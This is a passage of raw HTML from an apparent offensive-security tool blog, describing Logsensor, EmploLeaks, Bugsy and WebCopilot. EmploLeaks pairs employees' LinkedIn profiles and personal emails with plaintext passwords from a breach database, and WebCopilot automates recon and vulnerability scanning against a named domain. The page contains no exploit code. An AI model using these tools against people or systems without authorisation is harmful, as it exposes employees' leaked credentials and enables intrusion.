src="https://blogger.googleusercontent.com/img/a/AVvXsEhhaFlcrTyOBXpb-mMPlh4dlTKuB5YnVC8XVlZy7Kw9GurkV5TmOX90EBiZh_DzV5OTeEHzDaLrF0P6WKuiM5z5iYGO6_5taQmqNxMvYAZNI1KG9Zl9dNzken41kUOJ8H7USqtTcUznTMFz84b6IS3oxKUI6OeKpMB5jP0lM0WX0GLTZotc4NbgSs0ls6HS=w640-h372" width="640" /></a></p><p dir="auto" style="text-align: center;"><br /></p> <h3 dir="auto" tabindex="-1">Development</h3> <p dir="auto"><strong>TODO</strong></p> <ol dir="auto"> <li>adding "POST form SQli (Time based) scanning" and check for delay</li> <li>Fuzzing on Url Paths So as not to miss any login panel</li></ol><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Mr-Robert0/Logsensor" rel="nofollow" target="_blank" title="Download Logsensor">Download Logsensor</a></span></b></div>
</div>
</article>
<div class="hreview"><br /></div>
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-33534405939761299452024-02-18T15:24:00.000-08:002024-02-18T15:24:25.802-08:00EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials<article><div class="post-body entry-content" id="post-body-7722379393350333081" itemprop="articleBody"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBT6948Ba32ZeXPBqet7BC9xMmzCuw6nQdnBsAHc6-LtTEGiN7PIQHQqAUKcQxwRncm0kSSq0Sis1TDy3klEvbeBPl4P5YQGfSB7D7DwwmJfnaM19AJRsGOke2qr1yFHq3BB4iprZByv3hObSGvblJSiDpmr5EtxEPV60tuOI-fSP79yr_eBUvfHDfKA86/s1792/EmploLeaks.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBT6948Ba32ZeXPBqet7BC9xMmzCuw6nQdnBsAHc6-LtTEGiN7PIQHQqAUKcQxwRncm0kSSq0Sis1TDy3klEvbeBPl4P5YQGfSB7D7DwwmJfnaM19AJRsGOke2qr1yFHq3BB4iprZByv3hObSGvblJSiDpmr5EtxEPV60tuOI-fSP79yr_eBUvfHDfKA86/w640-h366/EmploLeaks.png" width="640" /></a></div><p> </p> <p dir="auto">This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.</p> <h2 dir="auto" tabindex="-1">How it Works</h2> <p dir="auto">The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You an easily add yours and connect to through the tool.</p> <h2 dir="auto" tabindex="-1">Installation</h2> <p dir="auto">To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the <em>cli</em> folder:</p> <div><pre><code>cd cli<br />pip install -r requirements.txt<br /></code></pre></div> <h3 dir="auto" tabindex="-1">OSX</h3> <p dir="auto">We know that there is a problem when installing the tool due to the <em>psycopg2</em> binary. If you run into this problem, you can solve it running:</p> <div><pre><code>cd cli<br />python3 -m pip install psycopg2-binary`<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Basic Usage</h2> <p dir="auto">To use the tool, simply run the following command:</p> <p dir="auto">python3 cli/emploleaks.py</p> <p dir="auto">If everything went well during the installation, you will be able to start using EmploLeaks:</p> <div><pre><code>___________ .__ .__ __<br />\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______<br /> | __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/<br /> | \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \<br />/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ ><br /> \/ \/|__| \/ \/ \/ \/<br /><br />OSINT tool 🕵 to chain multiple apis<br />emploleaks><br /></code></pre></div> <p dir="auto">Right now, the tool supports two functionalities:</p> <ul dir="auto"> <li>Linkedin, for searching all employees from a company and get their personal emails. <ul dir="auto"> <li>A GitLab extension, which is capable of finding personal code repositories from the employees.</li> </ul> </li> <li>If defined and connected, when the tool is gathering employees profiles, a search to a COMB database will be made in order to retrieve leaked passwords.</li> </ul> <h3 dir="auto" tabindex="-1">Retrieving Linkedin Profiles</h3> <p dir="auto">First, you must set the plugin to use, which in this case is <em>linkedin</em>. After, you should set your authentication tokens and the run the <em>impersonate</em> process:</p> <div><pre><code>emploleaks> use --plugin linkedin<br />emploleaks(linkedin)> setopt JSESSIONID<br />JSESSIONID: <br />[+] Updating value successfull<br />emploleaks(linkedin)> setopt li-at<br />li-at: <br />[+] Updating value successfull<br />emploleaks(linkedin)> show options<br />Module options:<br /><br />Name Current Setting Required Description<br />---------- ----------------------------------- ---------- -----------------------------------<br />hide yes no hide the JSESSIONID field<br />JSESSIONID ************************** no active cookie session in browser #1<br />li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1<br /> YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M<br /> cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI<br /> lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET<br /> kyCyfN58SNNH<br />emploleaks(linkedin)> run i mpersonate<br />[+] Using cookies from the browser<br />Setting for first time JSESSIONID<br />Setting for first time li_at<br /></code></pre></div> <p dir="auto">li_at and JSESSIONID are the authentication cookies of your LinkedIn session on the browser. You can use the Web Developer Tools to get it, just sign-in normally at LinkedIn and press right click and Inspect, those cookies will be in the Storage tab.</p> <p dir="auto">Now that the module is configured, you can run it and start gathering information from the company:</p> <div>Get Linkedin accounts + Leaked Passwords <p dir="auto">We created a custom <em>workflow</em>, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the <em>connect</em> command, as it is shown below:</p> <div><pre><code>emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4<br />[+] Connecting to the Leak Database...<br />[*] version: PostgreSQL 12.15<br /></code></pre></div> <p dir="auto">Once it's connected, you can run the <em>workflow</em>. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:</p> <div>As a conclusion, the tool will generate a console output with the following information: <ul dir="auto"> <li>A list of employees of the company (obtained from LinkedIn)</li> <li>The social network profiles associated with each employee (obtained from email address)</li> <li>A list of leaked passwords associated with each email address.</li> </ul> <h2 dir="auto" tabindex="-1">How to build the indexed COMB database</h2> <p dir="auto">An imortant aspect of this project is the use of the indexed COMB database, to build your version you need to <a href="https://github.com/infobyte/emploleaks/blob/main/comb.torrent" rel="nofollow" target="_blank" title="download the torrent first">download the torrent first</a>. Be careful, because the files and the indexed version downloaded requires, at least, 400 GB of disk space available.</p> <p dir="auto">Once the torrent has been completelly downloaded you will get a file folder as following:</p> <div><pre><code>├── count_total.sh<br />├── data<br />│ ├── 0<br />│ ├── 1<br />│ │ ├── 0<br />│ │ ├── 1<br />│ │ ├── 2<br />│ │ ├── 3<br />│ │ ├── 4<br />│ │ ├─â&€ 5<br />│ │ ├── 6<br />│ │ ├── 7<br />│ │ ├── 8<br />│ │ ├── 9<br />│ │ ├── a<br />│ │ ├── b<br />│ │ ├── c<br />│ │ ├── d<br />│ │ ├── e<br />│ │ ├── f<br />│ │ ├── g<br />│ │ ├── h<br />│ │ ├── i<br />│ │ ├── j<br />│ │ ├── k<br />│ │ ├── l<br />│ │ ├── m<br />│ │ ├⠀─ n<br />│ │ ├── o<br />│ │ ├── p<br />│ │ ├── q<br />│ │ ├── r<br />│ │ ├── s<br />│ │ ├── symbols<br />│ │ ├── t<br /></code></pre></div> <p dir="auto">At this point, you could import all those files with the command <code>create_db</code>:</p> <div>The importer takes a lot of time for that reason we recommend to run it with patience. <h2 dir="auto" tabindex="-1">Next Steps</h2> <p dir="auto">We are integrating other public sites and applications that may offer about a leaked credential. We may not be able to see the plaintext password, but it will give an insight if the user has any compromised credential:</p> <ul dir="auto"> <li>Integration with Have I Been Pwned?</li> <li>Integration with Firefox Monitor</li> <li>Integration with Leak Check</li> <li>Integration with BreachAlarm</li> </ul> <p dir="auto">Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:</p> <ul dir="auto"> <li>Javi Aguinaga: <a href="mailto:jaguinaga@faradaysec.com" rel="nofollow" target="_blank" title="jaguinaga@faradaysec.com">jaguinaga@faradaysec.com</a></li> <li>Gabi Franco: <a href="mailto:gabrielf@faradaysec.com" rel="nofollow" target="_blank" title="gabrielf@faradaysec.com">gabrielf@faradaysec.com</a></li> </ul> <p dir="auto">Or you con DM at <a href="https://twitter.com/pastacls" rel="nofollow" target="_blank" title="@pastacls">@pastacls</a> or <a href="https://twitter.com/gaaabifranco" rel="nofollow" target="_blank" title="@gaaabifranco">@gaaabifranco</a> on Twitter.</p><p dir="auto"><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/infobyte/emploleaks" rel="nofollow" target="_blank" title="Download Emploleaks">Download Emploleaks</a></span></b></div></div></div></div>
</div>
</article>
<div class="hreview"><br /></div>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-19609023972385889082024-02-18T15:21:00.000-08:002024-02-18T15:21:32.091-08:00Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code<article><div class="post-body entry-content" id="post-body-1977661655175549716" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjsN98aVD0IQlyFYnA2iZMa3tvkC5PBLzzlAOm0EmaFLV1ERrUZBNRi46SriqB17KMhO2x0YCVC1RyoOfiluqaYH1BmOU3z0s1MEqBdW3q2Eyh0XwpxuUIsAev57lc5SHMRwgM2Fy0rHbNNpjixbIwBSsMSS8KsYysU_tMtUSyDEwABQxJnRovM6T94TyLl"><img alt="" border="0" height="368" id="BLOGGER_PHOTO_ID_7310038649922486290" src="https://blogger.googleusercontent.com/img/a/AVvXsEjsN98aVD0IQlyFYnA2iZMa3tvkC5PBLzzlAOm0EmaFLV1ERrUZBNRi46SriqB17KMhO2x0YCVC1RyoOfiluqaYH1BmOU3z0s1MEqBdW3q2Eyh0XwpxuUIsAev57lc5SHMRwgM2Fy0rHbNNpjixbIwBSsMSS8KsYysU_tMtUSyDEwABQxJnRovM6T94TyLl=w640-h368" width="640" /></a></p><p><br /></p> <p dir="auto">Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.</p> <span><a name="more"></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">What is <a href="https://www.mobb.ai" rel="nofollow" target="_blank" title="Mobb">Mobb</a>?</h2> <p dir="auto"><a href="https://www.mobb.ai" rel="nofollow" target="_blank" title="Mobb">Mobb</a> is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.</p> <h2 dir="auto" tabindex="-1">What does Bugsy do?</h2> <p dir="auto">Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).</p> <p dir="auto">Scan</p> <ul dir="auto"> <li>Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo</li> <li>Analyzes the vulnerability report to identify issues that can be remediated automatically</li> <li>Produces the code fixes and redirects the user to the fix report page on the Mobb platform</li> </ul> <p dir="auto">Analyze</p> <ul dir="auto"> <li>Analyzes the a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically</li> <li>Produces the code fixes and redirects the user to the fix report page on the Mobb platform</li> </ul> <h2 dir="auto" tabindex="-1">Disclaimer</h2> <p dir="auto">This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.</p> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">You can simply run Bugsy from the command line, using npx:</p> <div><pre><code>npx mobbdev</code></pre><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/mobb-dev/bugsy" rel="nofollow" target="_blank" title="Download Bugsy">Download Bugsy</a></span></b></div></div>
</div>
</article>
<div class="hreview"><br /></div>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-10807822401968224262024-02-18T11:15:00.000-08:002024-02-18T11:15:05.773-08:00WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities<article><div class="post-body entry-content" id="post-body-5177943909853444750" itemprop="articleBody"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzh6enUQ3A3LZlXWM4Kwy7XwE8GnZa1yi500_opJVgt47pSjH5_NMCNgQEtI2JAGrLmt12nyxFto7Ek7tUDgkEkDHYBrMB6zSRMPkd6y77q0t9-XbpfZPSH11XVx7iHSdIb82oesuy6R4ckIY5ZsTgCzr-8zg9t3nEwm-T1yhVcmMUnEl-o-Dddb1STTfj/s1792/WebCopilot.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzh6enUQ3A3LZlXWM4Kwy7XwE8GnZa1yi500_opJVgt47pSjH5_NMCNgQEtI2JAGrLmt12nyxFto7Ek7tUDgkEkDHYBrMB6zSRMPkd6y77q0t9-XbpfZPSH11XVx7iHSdIb82oesuy6R4ckIY5ZsTgCzr-8zg9t3nEwm-T1yhVcmMUnEl-o-Dddb1STTfj/w640-h366/WebCopilot.png" width="640" /></a></div><p><strong><br /></strong></p><p><strong>WebCopilot</strong> is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.</p> <p dir="auto">The script first enumerate all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt then do active subdomain enumeration using gobuster from SecLists wordlist then filters out all the live subdomains using dnsx then it extract titles of the subdomains using httpx & scans for subdomain takeover using subjack. Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains then it use gf patterns to filters out xss, lfi, ssrf, sqli, open redirect & rce parameters from that given subdomains, and then it scans for vulnerabilities on the sub domains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Then it'll print out the result of the scan and save all the output in a specified directory.</p><span><a name="more"></a></span><p dir="auto"><br /></p> <h1 dir="auto" tabindex="-1">Features</h1> <ul dir="auto"> <li>Subdomain Enumeration using <a href="https://github.com/tomnomnom/assetfinder" rel="nofollow" target="_blank" title="assetfinder">assetfinder</a>, <a href="https://github.com/aboul3la/Sublist3r" rel="nofollow" target="_blank" title="sublist3r">sublist3r</a>, <a href="https://github.com/projectdiscovery/subfinder" rel="nofollow" target="_blank" title="subfinder">subfinder</a>, <a href="https://github.com/OWASP/Amass" rel="nofollow" target="_blank" title="amass">amass</a>, <a href="https://github.com/Findomain/Findomain" rel="nofollow" target="_blank" title="findomain">findomain</a>, etc.</li> <li>Active Subdomain Enumeration using <a href="https://github.com/OJ/gobuster" rel="nofollow" target="_blank" title="gobuster">gobuster</a> & <a href="https://github.com/OWASP/Amass" rel="nofollow" target="_blank" title="amass">amass</a> from <a href="https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS" rel="nofollow" target="_blank" title="SecLists/DNS">SecLists/DNS</a> wordlist.</li> <li>Extract titles and take screenshots of live subdoamins using <a href="https://github.com/michenriksen/aquatone" rel="nofollow" target="_blank" title="aquatone">aquatone</a> & <a href="https://github.com/projectdiscovery/httpx" rel="nofollow" target="_blank" title="httpx">httpx</a>.</li> <li>Crawl all the endpoints of the subdomains using <a href="https://github.com/tomnomnom/waybackurls" rel="nofollow" target="_blank" title="waybackurls">waybackurls</a> & <a href="https://github.com/bp0lr/gauplus" rel="nofollow" target="_blank" title="gauplus">gauplus</a> and filter out XSS, SQLi, SSRF, etc parameters using <a href="https://github.com/tomnomnom/gf" rel="nofollow" target="_blank" title="gf patterns">gf patterns</a>.</li> <li>Run different open-source tools (like <a href="https://github.com/hahwul/dalfox" rel="nofollow" target="_blank" title="dalfox">dalfox</a>, <a href="https://github.com/projectdiscovery/nuclei" rel="nofollow" target="_blank" title="nuclei">nuclei</a>, <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank" title="sqlmap">sqlmap</a>, etc) to search for vulnerabilities on these parameters and then save all the outputs in the folder.</li> </ul> <h1 dir="auto" tabindex="-1">Usage</h1> <div><pre><code>g!2m0:~ webcopilot -h</code></pre></div> <div class="highlight highlight-source-js notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" ──────▄▀▄─────▄▀▄ ─────▄█░░▀▀▀▀▀░░█▄ ─▄▄──█░░░░░░░░░░░█──▄▄ █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█ ██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗ ░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝ ░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░ ░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░░██║░░░ ░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░ ░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░ [●] @h4r5h1t.hrs | G!2m0 Usage: webcopilot -d <target> webcopilot -d <target> -s webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains] Flags: -d Add your target [Requried] -o To save outputs in folder [Default: domain.com] -t Number of threads [Default: 100] -b Add your server for BXSS [Default: False] -x Exclude out of scope domains [Default: False] -s Run only Subdomain Enumeration [Default: False] -h Show this help message Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server" dir="auto"><pre><code> <br /> ──────▄▀▄─────▄▀▄<br /> ─────▄█░░▀▀▀▀▀░░█▄<br /> ─▄▄──█░░░░░░░░░░░█──▄▄<br /> █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█<br /> ██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗<br />░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝<br />░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░<br />░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║ ░░░░██║░░██║░░░██║░░░<br />░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░<br />░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝ ░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░<br /> [●] @h4r5h1t.hrs | G!2m0<br /><br />Usage:<br />webcopilot -d <target><br />webcopilot -d <target> -s<br />webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]<br /><br />Flags: <br /> -d Add your target [Requried]<br /> -o To save outputs in folder [Default: domain.com]<br /> -t Number of threads [Default: 100]<br /> -b Add your server for BXSS [Default: False]<br /> -x Exclude out of scope domains [Default: False]<br /> -s Run only Subdomain Enumeration [Default: False]<br /> -h Show this help message<br /><br />Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss<br />Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server</code></pre></div> <h1 dir="auto" tabindex="-1">Installing WebCopilot</h1> <p dir="auto">WebCopilot requires <strong>git</strong> to install successfully. Run the following command as a <strong>root</strong> to install webcopilot</p> <div><pre><code>git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh</code></pre></div> <h3 dir="auto" tabindex="-1">Tools Used:</h3> <p align="center" dir="auto"> <a href="https://github.com/projectdiscovery/subfinder" rel="nofollow" target="_blank" title="SubFinder">SubFinder</a> • <a href="https://github.com/aboul3la/Sublist3r" rel="nofollow" target="_blank" title="Sublist3r">Sublist3r</a> • <a href="https://github.com/Findomain/Findomain" rel="nofollow" target="_blank" title="Findomain">Findomain</a> • <a href="https://github.com/tomnomnom/gf" rel="nofollow" target="_blank" title="gf">gf</a> • <a href="https://github.com/devanshbatham/OpenRedireX" rel="nofollow" target="_blank" title="OpenRedireX">OpenRedireX</a> • <a href="https://github.com/projectdiscovery/dnsx" rel="nofollow" target="_blank" title="dnsx">dnsx</a> • <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank" title="sqlmap">sqlmap</a> • <a href="https://github.com/OJ/gobuster" rel="nofollow" target="_blank" title="gobuster">gobuster</a> • <a href="https://github.com/tomnomnom/assetfinder" rel="nofollow" target="_blank" title="assetfinder">assetfinder</a> • <a href="https://github.com/projectdiscovery/httpx" rel="nofollow" target="_blank" title="httpx">httpx</a> • <a href="https://github.com/Emoe/kxss" rel="nofollow" target="_blank" title="kxss">kxss</a> • <a href="https://github.com/tomnomnom/qsreplace" rel="nofollow" target="_blank" title="qsreplace">qsreplace</a> • <a href="https://github.com/projectdiscovery/nuclei" rel="nofollow" target="_blank" title="Nuclei">Nuclei</a> • <a href="https://github.com/hahwul/dalfox" rel="nofollow" target="_blank" title="dalfox">dalfox</a> • <a href="https://github.com/tomnomnom/anew" rel="nofollow" target="_blank" title="anew">anew</a> • <a href="https://github.com/stedolan/jq" rel="nofollow" target="_blank" title="jq">jq</a> • <a href="https://github.com/michenriksen/aquatone" rel="nofollow" target="_blank" title="aquatone">aquatone</a> • <a href="https://github.com/ameenmaali/urldedupe" rel="nofollow" target="_blank" title="urldedupe">urldedupe</a> • <a href="https://github.com/OWASP/Amass" rel="nofollow" target="_blank" title="Amass">Amass</a> • <a href="https://github.com/bp0lr/gauplus" rel="nofollow" target="_blank" title="gauplus">gauplus</a> • <a href="https://github.com/tomnomnom/waybackurls" rel="nofollow" target="_blank" title="waybackurls">waybackurls</a> • <a href="https://github.com/dwisiswant0/crlfuzz" rel="nofollow" target="_blank" title="crlfuzz">crlfuzz</a> </p> <h2 dir="auto" tabindex="-1">Running WebCopilot</h2> <p dir="auto">To run the tool on a target, just use the following command.</p> <div><pre><code>g!2m0:~ webcopilot -d bugcrowd.com</code></pre></div> <p dir="auto">The <code>-o</code> command can be used to specify an output dir.</p> <div><pre><code>g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd</code></pre></div> <p dir="auto">The <code>-s</code> command can be used for only subdomain enumerations (Active + Passive and also get title & screenshots).</p> <div><pre><code>g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s </code></pre></div> <p dir="auto">The <code>-t</code> command can be used to add thrads to your scan for faster result.</p> <div><pre><code>g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 </code></pre></div> <p dir="auto">The <code>-b</code> command can be used for blind xss (OOB), you can get your server from <a href="https://xsshunter.com/" rel="nofollow" target="_blank" title="xsshunter">xsshunter</a> or <a href="https://interact.projectdiscovery.io/" rel="nofollow" target="_blank" title="interact">interact</a></p> <div><pre><code>g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss</code></pre></div> <p dir="auto">The <code>-x</code> command can be used to exclude out of scope domains.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss" dir="auto"><pre><code>g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt<br />g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss</code></pre></div> <h2 dir="auto" tabindex="-1">Example</h2> <p dir="auto">Default options looks like this:</p> <div><pre><code>g!2m0:~ webcopilot -d bugcrowd.com - bugcrowd</code></pre></div> <div class="highlight highlight-source-js notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" ──────▄▀▄─────▄▀▄ ─────▄█░░▀▀▀▀▀░░█▄ ─▄▄──█░░░░░░░░░░░█──▄▄ █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█ ██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗ ░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝ ░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░ ░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░░██║░░░ ░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░ ░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░ [●] @h4r5h1t.hrs | G!2m0 [❌] Warning: Use with caution. You are responsible for your own actions. [❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool. Target: bugcrowd.com Output: /home/gizmo/targets/bugcrowd Threads: 100 Server: False Exclude: False Mode: Running all Enumeration Time: 30-08-2021 15:10:00 [!] Please wait while scanning... [●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com [●] Subdoamin Scanned - [assetfinder✔] Subdomain Found: 34 [●] Subdoamin Scanned - [sublist3r✔] Subdomain Found: 29 [●] Subdoamin Scanned - [subfinder✔] Subdomain Found: 54 [●] Subdoamin Scanned - [amass✔] Subdomain Found: 43 [●] Subdoamin Scanned - [findomain✔] Subdomain Found: 27 [●] Active Subdoamin Scanning is in progress: [!] Please be patient. This may take a while... [●] Active Subdoamin Scanned - [gobuster✔] Subdomain Found: 11 [●] Active Subdoamin Scanned - [amass✔] Subdomain Found: 0 [●] Subdomain Scanning: Filtering out of scope subdomains [●] Subdomain Scanning: Filtering Alive subdomains [●] Subdomain Scanning: Getting titles of valid subdomains [●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/ [●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30 [●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032 [●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com [●] Vulnerabilities Scanned - [XSS✔] Found: 0 [●] Vulnerabilities Scanned - [SQLi✔] Found: 0 [●] Vulnerabilities Scanned - [LFI✔] Found: 0 [●] Vulnerabilities Scanned - [CRLF✔] Found: 0 [●] Vulnerabilities Scanned - [SSRF✔] Found: 0 [●] Vulnerabilities Scanned - [Sensitive Data✔] Found: 0 [●] Vulnerabilities Scanned - [Open redirect✔] Found: 0 [●] Vulnerabilities Scanned - [Subdomain Takeover✔] Found: 0 [●] Vulnerabilities Scanned - [Nuclie✔] Found: 0 [●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/ ▒█▀▀█ █▀▀ █▀▀ █░░█ █░░ ▀▀█▀▀ ▒█▄▄▀ █▀▀ ▀▀█ █░░█ █░░ ░░█░░ ▒█░▒█ ▀▀▀ ▀▀▀ ░▀▀▀ ▀▀▀ ░░▀░░ [+] Subdomains of bugcrowd.com [+] Subdomains Found: 0 [+] Subdomains Alive: 0 [+] Endpoints: 11032 [+] XSS: 0 [+] SQLi: 0 [+] Open Redirect: 0 [+] SSRF: 0 [+] CRLF: 0 [+] LFI: 0 [+] Sensitive Data: 0 [+] Subdomain Takeover: 0 [+] Nuclei: 0 " dir="auto"><pre><code> ──────▄▀▄─────▄▀▄<br /> ─────▄█░░▀▀▀▀▀░░█▄<br /> ─▄▄──█░░░░░░░░░░░█──▄▄<br /> █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█<br /> ██╗░░░░░░░██╗███████╗██████╗░░█████╗░ █████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗<br />░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝<br />░╚██╗████╗██╔╝█ ███╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░<br 